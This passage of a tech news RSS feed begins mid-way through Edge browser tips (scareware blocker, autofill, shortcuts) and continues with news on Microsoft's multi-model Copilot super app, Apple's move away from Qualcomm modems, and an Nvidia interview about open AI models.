<p class="wp-block-paragraph">The internet is filled with scammers using sophisticated attacks to steal your data or money. A common one is so-called “scareware,” in which when you visit a website, your PC is suddenly locked into full-screen mode filled with fake malware warnings that claim your computer has been infected and urge you to call a phony tech-support line or allow remote access to your device to supposedly fix the problem.</p>



<p class="wp-block-paragraph">Once you do that, the scammers steal your data, get you to pay for phony solutions, or embed malware on your system.</p>



<p class="wp-block-paragraph">To fight that, Edge includes an AI-powered scareware blocker that builds and constantly updates a machine-learning model that detects suspicious behavior and stops the scamware in its tracks.</p>



<p class="wp-block-paragraph">Typically, the scamware detector is turned on, but there’s a possibility it’s been turned off at some point or was never turned on in the first place. For example, on PCs with only 2GB of RAM or fewer than 5 cores, it’s not turned on by default. Microsoft recommends enabling it on those machines. To do it, in Edge go to <em>Settings &gt;Privacy, search, and services &gt; Security</em>, and in the “Scareware blocker” setting, turn the slider from off to on.</p>



<p class="wp-block-paragraph">When you do that, make sure that “Block sites detected as scams” and “Share detected scam sites with Microsoft Defender SmartScreen” are turned on as well.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-10-scareware-detector.jpg?quality=50&amp;strip=all" alt="screenshot of privacy and security settings in edge browser with scareware blocker enabled" class="wp-image-4200239" width="833" height="589" sizes="auto, (max-width: 833px) 100vw, 833px"><figcaption class="wp-element-caption"><p>Turn on Edge’s scareware blocker to protect yourself from scams and data theft.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<h2 class="wp-block-heading">11. Use Edge’s one-click form filler</h2>



<p class="wp-block-paragraph">How many hours a week do you spend mindlessly filling out web forms — your office or home address, shipping address, email address, and phone number? Wouldn’t it be nice to get that time back?</p>



<p class="wp-block-paragraph">With autofill, built into Edge, you can. To use it, in Edge go to <em>Settings &gt; Passwords and autofill &gt; Addresses and more</em>. Turn on the toggle next to “Save and autofill addresses.” You can also choose to have Copilot analyze web forms and decide which bits of your information belong in which part of the form.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ms-edge-productivity-11-autofill.jpg?quality=50&amp;strip=all" alt="screenshot of autofill settings in edge browser" class="wp-image-4200242" width="974" height="492" sizes="auto, (max-width: 974px) 100vw, 974px"><figcaption class="wp-element-caption"><p>Microsoft autofill saves information that can be used to fill out forms online.</p>
</figcaption></figure><p class="imageCredit">Preston Gralla / Foundry</p></div>



<p class="wp-block-paragraph">From now on, whenever you visit a web form, just click in a text box, and your information will appear in a popup. Select it and the form will fill in. You can go back to <em>Passwords and autofill</em> to change any information you want.</p>



<h2 class="wp-block-heading">12. Save time with keyboard shortcuts</h2>



<p class="wp-block-paragraph">There’s a good chance you use keyboard shortcuts for some of your office applications, like Word and Excel — and you likely use some for Windows itself.</p>



<p class="wp-block-paragraph">But when it comes to browsers, many people forgo the keyboard except when absolutely necessary. That’s too bad, because keyboard shortcuts are a big timesaver. So to improve your productivity, check out these keyboard shortcuts for Edge in Windows. (Mac users can generally substitute the Cmd key for Ctrl and the Opt key for Alt.)</p>



<p class="wp-block-paragraph">For even more shortcuts, see <a href="https://support.microsoft.com/en-us/microsoft-edge/keyboard-shortcuts-in-microsoft-edge-50d3edab-30d9-c7e4-21ce-37fe2713cfad" target="_blank" rel="noreferrer noopener">Microsoft’s complete list of keyboard shortcuts for Edge</a>.</p>



<h3 class="wp-block-heading">Useful keyboard shortcuts in Microsoft Edge</h3>



<figure class="wp-block-table is-style-stripes"><div class="overflow-table-wrapper"><table><thead><tr><th><strong>Key combination</strong></th><th><strong>Task</strong></th></tr></thead><tbody><tr><td><strong>Ctrl-Shift-B</strong></td><td>Show or hide the favorites bar</td></tr><tr><td><strong>Ctrl-D</strong></td><td>Add the current site to favorites</td></tr><tr><td><strong>Alt-D or Ctrl-L</strong></td><td>Select the URL in the Address bar</td></tr><tr><td><strong>Ctrl-E or Ctrl-K</strong></td><td>Open a search in the Address bar</td></tr><tr><td><strong>Ctrl-F</strong></td><td>Find on the current page</td></tr><tr><td><strong>Ctrl-R</strong></td><td>Reload the current page</td></tr><tr><td><strong>Ctrl-H</strong></td><td>Open your History</td></tr><tr><td><strong>Ctrl-M</strong></td><td>Mute or unmute volume on the current tab</td></tr><tr><td><strong>Ctrl-N</strong></td><td>Open a new window</td></tr><tr><td><strong>Ctrl-Shift-N</strong></td><td>Open a new InPrivate window</td></tr><tr><td><strong>Alt-F4 or Ctrl-Shift-W</strong></td><td>Close the current window</td></tr><tr><td><strong>Ctrl-T</strong></td><td>Open a new tab and switch to it</td></tr><tr><td><strong>Ctrl-W</strong></td><td>Close the current tab</td></tr><tr><td><strong>Ctrl-Tab</strong></td><td>Switch to the next tab</td></tr><tr><td><strong>Ctrl-Shift-Tab</strong></td><td>Switch to the previous tab</td></tr><tr><td><strong>Ctrl-+ (plus symbol)</strong></td><td>Zoom in</td></tr><tr><td><strong>Ctrl– (hyphen)</strong></td><td>Zoom out</td></tr><tr><td><strong>Ctrl-P</strong></td><td>Print the current page</td></tr><tr><td><strong><strong>Ctrl-Shift-.</strong></strong></td><td>Open the Copilot pane</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>This article was originally published in March 2021 and most recently updated in July 2026.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft doubles down on multi-model AI as it builds a Copilot super app]]></title>
<description><![CDATA[All of the major AI providers want you to use, and ideally stay within, their super apps, and now Microsoft is looking to capture that attention, too.



During an earnings call this week, CEO Satya Nadella confirmed that the tech giant is building a Copilot ‘super app’ that will be rolled out th...]]></description>
<link>https://tsecurity.de/de/3699921/ai-nachrichten/microsoft-doubles-down-on-multi-model-ai-as-it-builds-a-copilot-super-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699921/ai-nachrichten/microsoft-doubles-down-on-multi-model-ai-as-it-builds-a-copilot-super-app/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">All of the major AI providers want you to use, and ideally stay within, their super apps, and now Microsoft is looking to capture that attention, too.</p>



<p class="wp-block-paragraph">During an earnings call this week, CEO Satya Nadella confirmed that the tech giant is building a Copilot ‘super app’ that will be rolled out this quarter. The new platform will bring together various Copilot tools, including chat, Cowork, long-running Autopilot agents, and the always-on Microsoft Scout, powered by OpenClaw.</p>



<p class="wp-block-paragraph">Microsoft said the super app will be wired into many of its other governance platforms, including Agent 365, IT Ops, SecOps, FinOps, and business processes. And, it said, CRM and ERP systems will “serve as skills and plug-ins that go into core work.”</p>



<p class="wp-block-paragraph">“You’re able to take that enterprise-wide workflow and wire it into the super app,” Nadella said, describing it as “the coming together of a new way to work.”</p>



<p class="wp-block-paragraph">With this move, Microsoft will compete with OpenAI’s ChatGPT Work, Claude Cowork, and a growing number of others trying to capture as much of a user’s workflow as possible. It could prove a strong contender, as everyday Copilot “usage intensity” is at the same level as that of Outlook or Teams, Nadella said, and paid seats now surpass 30 million.</p>



<h2 class="wp-block-heading">Every model should be ‘swappable’</h2>



<p class="wp-block-paragraph">Even as it builds a super app to bridge workflows, Microsoft is acknowledging enterprise demand for model choice. Customers are making it clear that they don’t want to be locked into one model; they want the ability to move between open, closed, and frontier options based on the best tool for the job.</p>



<p class="wp-block-paragraph">This trend is reflected in Redmond’s own usage statistics: Since the beginning of the year, it has tracked a 5x increase in the number of customers building with models from multiple providers featured on its platform.</p>



<p class="wp-block-paragraph">The company claims it has the broadest model catalog in the cloud, offering more than 11,000 models from OpenAI, Anthropic, <a href="https://www.cio.com/article/4199721/microsoft-doubles-down-on-sovereign-ai-with-expanded-mistral-partnership.html" target="_blank">Mistral</a>, its own MAI family, and others.</p>



<p class="wp-block-paragraph">“We are building a new model system, where the harness, context, memory, and action space are separate from any one model family, thereby moving the frontier on the cost-to-outcome curve,” Nadella said. “That’s really the enterprise design architecture that we are going to evangelize.”</p>



<p class="wp-block-paragraph">He described enterprises as “learning machines” that need their own internal learning machines, and said that they will be evaluating how providers are helping them reach their business goals and support knowledge creation.</p>



<p class="wp-block-paragraph">“The models are an input, not some extraction of the knowledge of the enterprise,” Nadella said. “This is not going to be about, ‘come in and take all my knowledge and benefit yourself, [and] I am not getting anything out of it.’”</p>



<p class="wp-block-paragraph">The key is in balancing the advantages of frontier models with lower-cost options, open weights with closed weights, and having the ability to train internal models based on outputs, traces, and context. “You should and you can use frontier models,” Nadella said. “There’s no reason not to.”</p>



<p class="wp-block-paragraph">However, he said, any given model at any given time should be swappable to democratize design.</p>



<p class="wp-block-paragraph">For instance, data from cybersecurity evaluation framework CyberGym showed that Microsoft’s new <a href="https://microsoft.ai/news/introducing-mai-cyber-1-flash-inside-mdash/" target="_blank" rel="noreferrer noopener">MAI-Cyber-1-Flash</a> coding agent achieved Claude Mythos-level performance at 50% of the cost. This is because 90% of tasks were completed by Cyber-1-Flash and 10% by frontier models from OpenAI, Anthropic, and others. </p>



<p class="wp-block-paragraph">This ability to use the right model for the right task in what is essentially a pipeline job is a “super important characteristic,” Nadella said. Microsoft Copilot, Security Copilot, and GitHub Copilot are all built to support movement between different models based on the task.</p>



<p class="wp-block-paragraph">This strategy is also reflected in the company’s new <a href="https://www.csoonline.com/article/4202080/microsoft-unveils-multi-model-agentic-cyber-stack-for-security-operations.html" target="_blank">Project Perception</a> cybersecurity offering. The platform features three specialized types of agent (red, blue, and green), and the underlying harness decides which AI model is best suited for a given task. Guided by specialized playbooks, red team agents discover vulnerabilities, blue team agents triage, and green team agents propose remediation plans.</p>



<p class="wp-block-paragraph">“You create your own agentic system that’s continuously operating to create the cyber defense you need,” Nadella explained. “Especially in cyber[security], it becomes critical to have that multi-model approach.”</p>



<p class="wp-block-paragraph">Nadella also pointed to the recent Hugging Face incident, in which an <a href="https://www.csoonline.com/article/4202852/openai-rogue-ai-agents-attack-expanded-beyond-hugging-face.html" target="_blank">OpenAI model went rogue</a>, broke out of its sandbox, and launched an attack against the popular open-source platform, noting that enterprises will likely need to use multiple models to offset and remediate the various challenges of each, and should not be “subject to the refusals of one model.”</p>



<p class="wp-block-paragraph">“We talk about the frontier as if it’s one thing,” Nadella said. “The frontier is about every firm having a frontier, the choice, the cost control, and the capability that they need in order to be able to control their destiny.”</p>



<h2 class="wp-block-heading">Increased push to usage-based pricing, closing demand gaps</h2>



<p class="wp-block-paragraph">As Microsoft emphasizes its model-agnostic architecture, it is also shifting from per-seat to per-seat-plus-consumption pricing; the company recently added usage-based billing to Cowork and Agent 365, and plans to continue that trend across its products.</p>



<p class="wp-block-paragraph">While these moves have resulted in sticker shock and ‘<a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html" target="_blank">tokenmaxxing</a>’ at many companies, Nadella framed it as a revenue driver. “We are advancing the frontier on the cost-to-outcome curve, ensuring every customer can turn tokens into business results.”</p>



<p class="wp-block-paragraph">Meanwhile, Microsoft said it will continue to close data demand-capacity gaps.</p>



<p class="wp-block-paragraph">The company added 88 data centers in FY 2026, including 31 across five continents this past quarter. It contended that it is bringing capacity online “faster than ever,” reducing dock-to-live times for new GPUs in its largest regions by nearly 50% over the fiscal year.</p>



<p class="wp-block-paragraph">However, CFO Amy Hood acknowledged during the earnings call, “the situation is obviously that demand exceeds available supply in a relatively extreme moment.”</p>



<p class="wp-block-paragraph">Reflecting this, revenue for Azure and other cloud services grew by 43% in Microsoft’s fiscal year ended June 30, and the company expects similar revenue growth (45%) in fiscal year ‘27.</p>



<p class="wp-block-paragraph">Hood said that Microsoft remains “focused on delivering efficiencies,” including in its CPU and GPU fleets, and engineers are also working on process improvements. The company added another gigawatt of capacity this quarter and is on track to roughly double its overall capacity in two years.</p>



<p class="wp-block-paragraph">“We are also getting more from the infrastructure we already have by optimizing across silicon, systems, and software,” Hood said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4203686/microsoft-doubles-down-on-multi-model-ai-as-it-builds-a-copilot-super-app.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Qualcomm shows Apple’s modem transition is almost complete]]></title>
<description><![CDATA[Apple may be moving faster than expected in its modem development work, and Qualcomm’s latest comments suggest that shift is already reshaping the iPhone supply chain. 



Qualcomm overnight said supply constraints are shrinking some of its Apple business faster than anticipated. “It’s availabili...]]></description>
<link>https://tsecurity.de/de/3699923/ai-nachrichten/qualcomm-shows-apples-modem-transition-is-almost-complete/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699923/ai-nachrichten/qualcomm-shows-apples-modem-transition-is-almost-complete/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Apple may be moving faster than expected in its modem development work, and Qualcomm’s latest comments suggest that shift is already reshaping the iPhone supply chain. </p>



<p class="wp-block-paragraph">Qualcomm overnight said supply constraints are shrinking some of its Apple business <a href="https://www.reuters.com/business/retail-consumer/qualcomm-forecasts-weak-quarterly-profit-expects-apple-revenue-drop-accelerate-2026-07-29/" target="_blank" rel="noreferrer noopener">faster than anticipated</a>. “It’s availability of supply,” CEO <a href="https://www.reuters.com/business/retail-consumer/qualcomm-forecasts-weak-quarterly-profit-expects-apple-revenue-drop-accelerate-2026-07-29/" target="_blank" rel="noreferrer noopener">Cristiano Amon told Reuters</a>.</p>



<p class="wp-block-paragraph">While he wasn’t specific, that likely reflects the <a href="https://www.computerworld.com/article/4190611/apples-memory-problem-is-your-problem-too.html">broader industry shortage</a> in memory, storage, and everything else and means the company’s share of components used for the next iPhone launch will fall “well below” its anticipated estimates. Amon says this is part of a transition in which future Qualcomm income will be generated by AI datacenter demand.</p>



<p class="wp-block-paragraph">The company also intends to boost modem prices on Sept. 1 (And remember, the patent licensing agreement between Apple and Qualcomm expires in March 2027.)</p>



<p class="wp-block-paragraph">Given Apple is selling plenty of smartphones (even as the broader industry shrinks), supply constraints won’t necessarily be because of demand for the devices; this could reflect Apple’s plan to divide the iPhone release schedule across several months, as well as its future modem development efforts. </p>



<p class="wp-block-paragraph">Reports for months have indicated Apple plans to <a href="https://www.computerworld.com/article/4091060/apple-preps-for-iphone-diversification.html">introduce new iPhones twice a year</a>, with the Pro range updated each fall and entry-level devices scheduled for spring. It’s a move that’s likely to help build more consistent quarterly earnings by spreading demand across different parts of the year and could reduce short-term demand for components. </p>



<p class="wp-block-paragraph">Things look a little different this year, of course; the expected introduction of the <a href="https://www.applemust.com/what-we-think-we-know-about-iphone-ultra/" target="_blank" rel="noreferrer noopener">new iPhone Ultra</a> means Apple will be making three new iPhone models, not the customary four – though there is also speculation the Ultra may not ship in quantity until later on this year. </p>



<h2 class="wp-block-heading"><strong>How much does Apple need Qualcomm? Not much</strong></h2>



<p class="wp-block-paragraph">There’s also Apple’s own <a href="https://www.computerworld.com/article/1671276/what-you-need-to-know-about-apples-1b-intel-5g-modem-investment.html">modem development plans</a> to consider. We know Apple’s relationship with Qualcomm isn’t easy. The two firms were engaged in costly litigation before they found a way <a href="https://www.computerworld.com/article/1722166/thoughts-on-the-apple-qualcomm-settlement.html">to bury the hatchet</a> and work together on 5G iPhones while Apple <a href="https://www.computerworld.com/article/3829149/everything-we-know-about-apples-c1-5g-modem-in-iphone-16e.html">developed its C-series modems</a>.</p>



<p class="wp-block-paragraph">Those C-series modems are already used in Apple devices. The iPhone 16e, 17e and iPhone Air carry Apple’s C1/C1X modem, with the C2 variant expected in the 18 Pro series this year. </p>



<p class="wp-block-paragraph"><a href="https://9to5mac.com/2026/06/09/iphone-18-pros-new-c2-chip-will-bring-three-advantages-over-iphone-17/" data-type="link" data-id="https://9to5mac.com/2026/06/09/iphone-18-pros-new-c2-chip-will-bring-three-advantages-over-iphone-17/" target="_blank" rel="noreferrer noopener">Apple’s new modem</a> is expected to deliver better battery efficiency, improved cellular network privacy, and AI-supported network efficiency. So, your device should last longer, be less visible to your carrier, and better able to get a connection — even when connectivity is constrained. </p>



<p class="wp-block-paragraph">Next year’s 18-series devices will certainly stick with Apple’s modems, meaning Qualcomm’s remaining Apple business should be wrapped up in the release this fall. As Apple’s modem appears in more devices, you’ll probably only see Qualcomm modems used to provide mmWave support, which realistically has very little traction or carrier support outside America.</p>



<h2 class="wp-block-heading"><strong>Waiting to replace mmWave</strong></h2>



<p class="wp-block-paragraph">That view is supported by reports based on information <a href="https://daringfireball.net/2026/07/a_tale_of_two_modems" target="_blank" rel="noreferrer noopener">recently stolen from Apple’s India-based iPhone partner</a>, Tata. It claimed Apple will use the C2 in internationally sold iPhones Pro and Max, while keeping to Qualcomm in US devices.</p>



<p class="wp-block-paragraph">If Apple takes the same approach with next year’s iPhone releases, it would mean only US iPhones — and probably not all of them — have mmWave. As a result, Qualcomm’s modems will only be available in a very small subset of iPhones sold. That would almost certainly account for the modem maker’s reduced Apple optimism. (Apple is also part of the 6G standard development group, which implies it hopes to find some way to replace mmWave.)</p>



<p class="wp-block-paragraph">It also indicates Apple is less likely to renew its current patent licensing deal, though it could still require some licenses since Qualcomm’s SEPs include some 5G-essential technologies. The other takeaway here: Apple has a <a href="https://www.applemust.com/apples-5g-modem-grows-up-real-world-parity-with-qualcomm-is-finally-here/#google_vignette" target="_blank" rel="noreferrer noopener">high degree of confidence in its forthcoming C2 modem</a>, which makes sense given how well-received its C1 modem has been. </p>



<h2 class="wp-block-heading"><strong>A clean sweep</strong></h2>



<p class="wp-block-paragraph">One more thought. It is interesting the extent to which Tim Cook’s Apple seems to be finalizing much of its business before the transition to new CEO John Ternus on Sept. 1. (It is also notable that Qualcomm also intends to raise its prices on the same date.)</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Nvidia genAI chief explains why open models matter in AI]]></title>
<description><![CDATA[When Nvidia CEO Jensen Huang speaks, the tech industry listens. He used his first-ever post on X last week to argue that open AI models “strengthen safety and cybersecurity, accelerate innovation and diffusion, and enable sovereignty.”



Nvidia is a chip company (with a focus on GPUs). But it al...]]></description>
<link>https://tsecurity.de/de/3699927/ai-nachrichten/qa-nvidia-genai-chief-explains-why-open-models-matter-in-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699927/ai-nachrichten/qa-nvidia-genai-chief-explains-why-open-models-matter-in-ai/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When Nvidia CEO Jensen Huang speaks, the tech industry listens. He used his <a href="http://(https//x.com/search?q=jensen%20huang" target="_blank" rel="noreferrer noopener">first-ever post on X</a> last week to argue that <a href="https://www.computerworld.com/article/4172545/why-open-ai-models-are-gaining-ground-on-llms.html" data-type="link" data-id="https://www.computerworld.com/article/4172545/why-open-ai-models-are-gaining-ground-on-llms.html">open AI models</a> “strengthen safety and cybersecurity, accelerate innovation and diffusion, and enable sovereignty.”</p>



<p class="wp-block-paragraph">Nvidia is a chip company (with a focus on GPUs). But it also has its own AI models that include Nemotron, an open-weight model that’s free to download and modify. The company is also pushing for open AI technologies and security through the <a href="https://nvidianews.nvidia.com/news/nvidia-launches-nemotron-coalition-of-leading-global-ai-labs-to-advance-open-frontier-models" target="_blank" rel="noreferrer noopener">Nemotron Coalition</a>  and the newly launched <a href="https://blogs.nvidia.com/blog/open-secure-ai-alliance/" target="_blank" rel="noreferrer noopener">Open Secure AI Alliance</a>. </p>



<p class="wp-block-paragraph">With Huang’s recent comments in mind, <em>Computerworld</em> sat down with Kari Briski, Nvidia’s vice president of generative AI (genAI) software, to find out more about open models and why they matter for enterprise and sovereign applications.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/nvidia-headshot-kari-briski.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Kari Briski, vice president of generative AI software at Nvidia" class="wp-image-4202784" width="1024" height="768" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Kari Briski, vice president of generative AI software at Nvidia.</p>
</figcaption></figure><p class="imageCredit">Nvidia</p></div>



<p class="wp-block-paragraph"><strong>What do open models really give enterprises and countries? </strong>“Open models allow enterprises and countries to own, inspect, and adapt models with their own data. The learning rate of adoption differs by region and enterprise, so there are different pockets of acceleration, but all the models have made tremendous progress closing the gap. What’s interesting about Nemotron is that we also publish our data, and that opened up a new world of engagement. </p>



<p class="wp-block-paragraph">“Enterprises reached out, saying, ‘Thank you, but I want to understand why you put this set of data out.’ That got them in the mindset that they could curate, create, capture, and control their own data.”</p>



<p class="wp-block-paragraph"><strong>When you develop these open models, do you have CIOs in mind, or sovereign uses? Where does the rubber hit the road? “</strong>Both. At the highest level, it’s very much the same: use cases, data sets, outcomes you want to achieve. It used to be question and answer, now it’s agentic workloads, getting stuff done, calling tools. To get a task done, which tool do you call? That’s different for every enterprise and every local region, which is why we match local models to local ecosystems, with post-training on those local models. </p>



<p class="wp-block-paragraph">“One enterprise can have 2,000 tools; a local region, 2,000 regional tools. [They’re] fundamentally the same, but with different go-to-market motions: reinforcement learning environments, synthetic data generation, or anonymizing and differential privacy for healthcare and banking data.”</p>



<p class="wp-block-paragraph"><strong>Why does Nvidia put its models out in the open? What do you get out of it? </strong>“We’re building Nemotron first and foremost for ourselves, to understand our systems running at scale — not just for training but also for inference, which allows us to iterate on things like model architecture for token efficiency. We believe in a thriving ecosystem. When you put a model out into the open, you get more startups, more builders, lower entry barriers.”</p>



<p class="wp-block-paragraph"><strong>What’s the connection between open models and sovereign AI? “</strong>To be very honest, it’s about bootstrapping a region that otherwise didn’t have the compute to get to a base-level model. Centers of excellence historically lived in higher education or research, and in certain pockets of the world, getting onto a compute cluster was grant-based: get on, get off, then find another grant. That start-stop, not being able to constantly iterate, is difficult. It’s the scaling laws of AI: the more compute, the more intelligence; the more access, the faster you can drive  them. Open models and open data are that bootstrap. You don’t have to recreate capturing the knowledge of the internet as a pre-training model.”</p>



<p class="wp-block-paragraph"><strong>Regionally, things are different. Voice and word of mouth are big in South Asia, chatbots less so. What’s the approach going forward? Is it an SLM approach? </strong>“You’re going to hate my answer: it depends. Language is ever evolving. Go back to first principles: AI is infrastructure. Not just the model, but the harness, the skills, the runtime. All of this is a new computing platform, and when we deploy it, it’s how can it understand and adapt. We’re at the tip of the iceberg integrating AI into everyday applications. The more it can understand and update even dialects, the better. </p>



<p class="wp-block-paragraph">“Understanding those niche areas is what drives the data flywheel of deploying AI. It won’t be overnight. That’s why this is a new industrial revolution. We have to lay the infrastructure everywhere for these models to update. And to your point, it could be a large teacher model that at the edge is an SLM. It depends.”</p>



<p class="wp-block-paragraph"><strong>AI companies in Nepal told me, “We can’t innovate because we don’t have access to a GPU.” They want a model that runs on the hardware they have. Is that the way you look at it? </strong>“If you know Nvidia, it’s all about the ecosystem, and we want to enable developers. This is why we have many different sizes: Nano, Super, and Ultra of the Nemotron family, not just for where you deploy, but for developers to iterate on smaller GPUs, then scale to a more robust model like Ultra.</p>



<p class="wp-block-paragraph">“We run as a model-as-a-service across the cloud providers. Day zero, they all had it ready to go, along with our inference partners, optimized and efficient for their workload. We don’t pitch the checkpoint over the wall; we help them take it that last mile, and partners get early access, so on release day it’s available on whatever platforms they use.”</p>



<p class="wp-block-paragraph"><strong>The industry works together on open technology like Linux. Can you partner on models, and is the focus on performance or quality? “</strong>On performance versus quality, it’s both. You can’t have a high-quality model that is slow or heavy, and you can’t have a fast model that sucks. We’re going after three dimensions: efficient, state-of-the-art, and open. And models do work together today — a planning agent routes a question to the best model to complete the task.</p>



<p class="wp-block-paragraph">“On partnering, that’s our goal in true open source and in the Nemotron Coalition, bringing the best and brightest minds with the commitment to open source and collaboration. Members contribute in different ways: pre-training new architectures, post-training RL environments, contributing data. The goal is everybody working together on one model. That’s why the coalition matters for model architecture —  token efficiency, latent mixture of experts, changing how we route it. These are new architectures we’re thinking about. We need these ideas coming in from others.”</p>



<p class="wp-block-paragraph"><strong>Is the latest open-source model always the best? In developing countries, some go back to older models they’ve tested enough to predict the responses. “</strong>Models aside, that’s true for any software. You do an upgrade and it’s just not working the way it worked before. The results aren’t better. When you build a system around it with certain prompts, a model might not react the way it used to. This is why we built the coalition, why we work with a very close set of partners. We pull their evaluation benchmarks in-house to make sure we’re not regressing, only improving. </p>



<p class="wp-block-paragraph">“You have to switch your mind with AI and the way you test it. Is the latest model necessarily the best? I’m going to say yes. Companies and countries need the skills to quickly evaluate, update prompts, and adopt new models.”</p>



<p class="wp-block-paragraph"><strong>Can I fork an Nvidia model, put it on Hugging Face, and do what I want with it? Do you take lessons from the forks and benchmarks? “</strong>We have a very open license. We put out reduced precision NVFP4 checkpoints. Those are the most popular, especially with Ultra, because people want the smallest footprint to run that robust model. Even with mature models, there’s all kinds of quantization happening and getting posted back, and I love that community engagement. I love seeing different forks of our models. We track those, too, which gives us an idea of what matters to people. That’s the purpose of putting it out in the open: to see how they change it, how they need to adapt it, then put it back out for the rest of the world to enjoy.</p>



<p class="wp-block-paragraph">“Benchmarks are table stakes, not the ceiling of where we need to go, so we’re always looking for new benchmarks and new workloads. In the last 90 days, the style of workload changed dramatically, going from question-answer pairs to agentic workloads, and those workloads mattered to make sure we were tracing our model, which led to us being able to fully trace it. We want to show that you can be just as intelligent in a short amount of time, compute efficient, token efficient.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Must-Read Resources for Mastering Small Language Models]]></title>
<description><![CDATA[Five resources covering SLM architecture, fine-tuning, agentic workflows, and local deployment for data professionals.]]></description>
<link>https://tsecurity.de/de/3699781/ai-nachrichten/5-must-read-resources-for-mastering-small-language-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699781/ai-nachrichten/5-must-read-resources-for-mastering-small-language-models/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:45 +0200</pubDate>
<content:encoded><![CDATA[Five resources covering SLM architecture, fine-tuning, agentic workflows, and local deployment for data professionals.]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Best AI Tools for Data Analysis You Should Try in 2026]]></title>
<description><![CDATA[Discover five of the best AI tools for data analysis that can clean data, write code, create visualizations, and generate insights faster.]]></description>
<link>https://tsecurity.de/de/3699783/ai-nachrichten/5-best-ai-tools-for-data-analysis-you-should-try-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699783/ai-nachrichten/5-best-ai-tools-for-data-analysis-you-should-try-in-2026/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:45 +0200</pubDate>
<content:encoded><![CDATA[Discover five of the best AI tools for data analysis that can clean data, write code, create visualizations, and generate insights faster.]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepSeek Upgrades DeepSeek-V4-Flash-0731 with Major Agentic and Coding Gains]]></title>
<description><![CDATA[DeepSeek published DeepSeek-V4-Flash-0731 on Hugging Face and moved the official V4-Flash API into public beta on July 31, 2026. The model card is explicit that this is the official release superseding the preview, and that the architecture and size are unchanged. The gains come from re-post-trai...]]></description>
<link>https://tsecurity.de/de/3699734/ai-nachrichten/deepseek-upgrades-deepseek-v4-flash-0731-with-major-agentic-and-coding-gains/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699734/ai-nachrichten/deepseek-upgrades-deepseek-v4-flash-0731-with-major-agentic-and-coding-gains/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:39 +0200</pubDate>
<content:encoded><![CDATA[<p>DeepSeek published DeepSeek-V4-Flash-0731 on Hugging Face and moved the official V4-Flash API into public beta on July 31, 2026. The model card is explicit that this is the official release superseding the preview, and that the architecture and size are unchanged. The gains come from re-post-training, not a new design. The checkpoint ships with the […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/31/deepseek-upgrades-deepseek-v4-flash-0731-with-major-agentic-and-coding-gains/">DeepSeek Upgrades DeepSeek-V4-Flash-0731 with Major Agentic and Coding Gains</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Memory Efficient Audio Synthesis with Decoupled Temporal Depth Diffusion Transformers]]></title>
<description><![CDATA[Siri Expressive Voices synthesize rich, configurable speech in real time and entirely on device, powered by AFM 3 Core Advanced, Apple’s most powerful on-device foundation model. This work presents the memory-efficient audio synthesis architecture behind that capability: a detokenizer that conver...]]></description>
